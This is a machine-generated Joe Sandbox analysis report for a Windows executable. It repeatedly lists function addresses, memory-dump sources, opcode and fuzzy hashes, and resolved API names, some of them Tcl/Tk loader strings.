                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 2a05c6059b1d422c1c0961fd67960772ff2ba502e6a05041136868912dff4d23
                                                                                                                                                                                                                                                                                • Instruction ID: 7b4da0522fc4debff679a06f90e78349718e7948a9f69cfd69014cbd83a1b5bf
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a05c6059b1d422c1c0961fd67960772ff2ba502e6a05041136868912dff4d23
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E81E372A0878156EBB4DB19988037AA790FF457D4F94833DEAAD53B99CF3DD4009B10
                                                                                                                                                                                                                                                                                Function 00007FF7333B7688 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: eef01635753a3689cfd7199ced0fb7e0b5b43189aa21453eecf28f9410e22187
                                                                                                                                                                                                                                                                                • Instruction ID: ff6f3ced8b6dc90ee031ee381337fd3850b4260e2b93caade357d2b7c8feb8ea
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eef01635753a3689cfd7199ced0fb7e0b5b43189aa21453eecf28f9410e22187
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A61D722E0C28267F7F4AA28945627CF581EF40760F94823DF62DA67D1DE7DE840A720
                                                                                                                                                                                                                                                                                Function 00007FF7333A132C Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                                • Instruction ID: fa046f30e8aa03252123918b3797def36ba9f4a8fc6c722e677440b2a6c42ab4
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63518232E2865196E7B49F29C04427CB7B0EB45B68F68C139CA5D27BD4CB3AE843D750
                                                                                                                                                                                                                                                                                Function 00007FF7333A0F1C Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                                • Instruction ID: d4f0533f0d83d6dd74aac06cf5fe995997d884e7c6857dcec1fb836db21271d2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF51A432A1865196E7B49B29C050278B3A0EB45B68F64C239DE5D27794CB3EE843E790
                                                                                                                                                                                                                                                                                Function 00007FF7333A173C Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                                • Instruction ID: 12f4aa9fd7127bdb50745e2f8766af80bdfe0a557697a8104632833aca2e8d67
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B51E536E1865192E7B49B29C04023CB3A1EB44F69F68D239DE5D27794CF3AE843D790
                                                                                                                                                                                                                                                                                Function 00007FF7333A1128 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                                                                                                                • Instruction ID: 6d025b343be698a98b740aa69617040774af0752aaa240e48b495a6df9b0125d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4751C236E2865196E7B49B28C040639B7B0EB44F58FA8C139CE5D67794CF3AE843E750
                                                                                                                                                                                                                                                                                Function 00007FF7333A0D18 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                                                                                                                • Instruction ID: c71a3369f7a5e48a46d7cf79c15a9331e2b34234bf5628d0d64438761335073e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD51E733A18A5196E7B49B28C44077DB7A0EB45F58F648139CE9C277A4CB3EF842E750
                                                                                                                                                                                                                                                                                Function 00007FF7333A1538 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                                                                                                                • Instruction ID: dc4dcaf729a2dacb1a0ac49c6fc9d5156b18478bfaf97ec991960cca1b6d4f3e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C251E836E1865192E7B49F29C040239B7A0EB44F58FA8C139CE5D677A4DF3AEC42D790
                                                                                                                                                                                                                                                                                Function 00007FF7333A6CF0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                                • Instruction ID: ac8a386f6fccde5850c66e5acc8056dfeefe9ed743949692945e285ee9452633
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A41EB92C8968B14E9F599184604AB4B6909F13BE0DD8E2BCCCBD333E7CD2D2586D320
                                                                                                                                                                                                                                                                                Function 00007FF7333AAE20 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                • Opcode ID: 7a7ebbd17873febb15e29de35626f23177de76f7dba359f1eda69606ccc1bea3
                                                                                                                                                                                                                                                                                • Instruction ID: e0ad2fbae97d26a531db0dc235f5ef6b5e9355c3f42bd3742a7cf338c16eb381
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7ebbd17873febb15e29de35626f23177de76f7dba359f1eda69606ccc1bea3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6341E473714A5592EF98DF2AE9141A9B3A1FB48FC0B89D03AEE1DA7B54DE3CD4419300
                                                                                                                                                                                                                                                                                Function 00007FF7333A9020 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 3b4b82ba6feb1f2c625fcdd7b78fc6310e7e433b3778e25011fb45a65c2c329c
                                                                                                                                                                                                                                                                                • Instruction ID: 6c9ae345e27890028e6aef5faae2eabff10af552603a6be5fbd1e8cac842b008
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b4b82ba6feb1f2c625fcdd7b78fc6310e7e433b3778e25011fb45a65c2c329c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B731A732B18B4191E7B4EF26644016DF695AF84BD0F54823CEA6DB3B96DF3CD4016714
                                                                                                                                                                                                                                                                                Function 00007FF7333BA7E0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 47026fad3db46e1691e12129f37de500b9ca6af24d2cbfa86880e77cbf706e66
                                                                                                                                                                                                                                                                                • Instruction ID: df0fb3db21e181a1c7479150052806018e4bf6ecb7979b184a4a206f59f61ab2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47026fad3db46e1691e12129f37de500b9ca6af24d2cbfa86880e77cbf706e66
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDF044726286959AEBE49F2DA44262977E0FB483C0B90C03ED58D83E04D77C90519F14
                                                                                                                                                                                                                                                                                Function 00007FF73339C8A0 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 0095cffb8fe81db1077c877ec2d194bac0958fa6bcac770c2119ba444bc36b37
                                                                                                                                                                                                                                                                                • Instruction ID: c99f4640a48e1d2e9c3505d457c6d66c50be3f60a4328b905f79808be2b29379
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0095cffb8fe81db1077c877ec2d194bac0958fa6bcac770c2119ba444bc36b37
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9A0016191C882E0F6A8AB01A961130A260BB51301BC0807AD06D660A09F3CA400A320
                                                                                                                                                                                                                                                                                Function 00007FF733396B00 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                                • Opcode ID: 3ce57ac688b021c07c17bb9d18c3d2db368ff9ca427b7eb3b8bd4dc412038eb8
                                                                                                                                                                                                                                                                                • Instruction ID: 4fe28b4496b6351146c19822cb2eea849d4c3cd93e30693f9c71722bd6ead98c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ce57ac688b021c07c17bb9d18c3d2db368ff9ca427b7eb3b8bd4dc412038eb8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B902C264A4EB0BF1FAF9BF65B910674B360AF44754BC4923DD40E26264EF3CA549A330
                                                                                                                                                                                                                                                                                Function 00007FF733397610 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733398950: MultiByteToWideChar.KERNEL32(?,?,?,00007FF733393A04,00000000,00007FF733391965), ref: 00007FF733398989
                                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF733397CF7,FFFFFFFF,00000000,?,00007FF733393101), ref: 00007FF73339766C
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
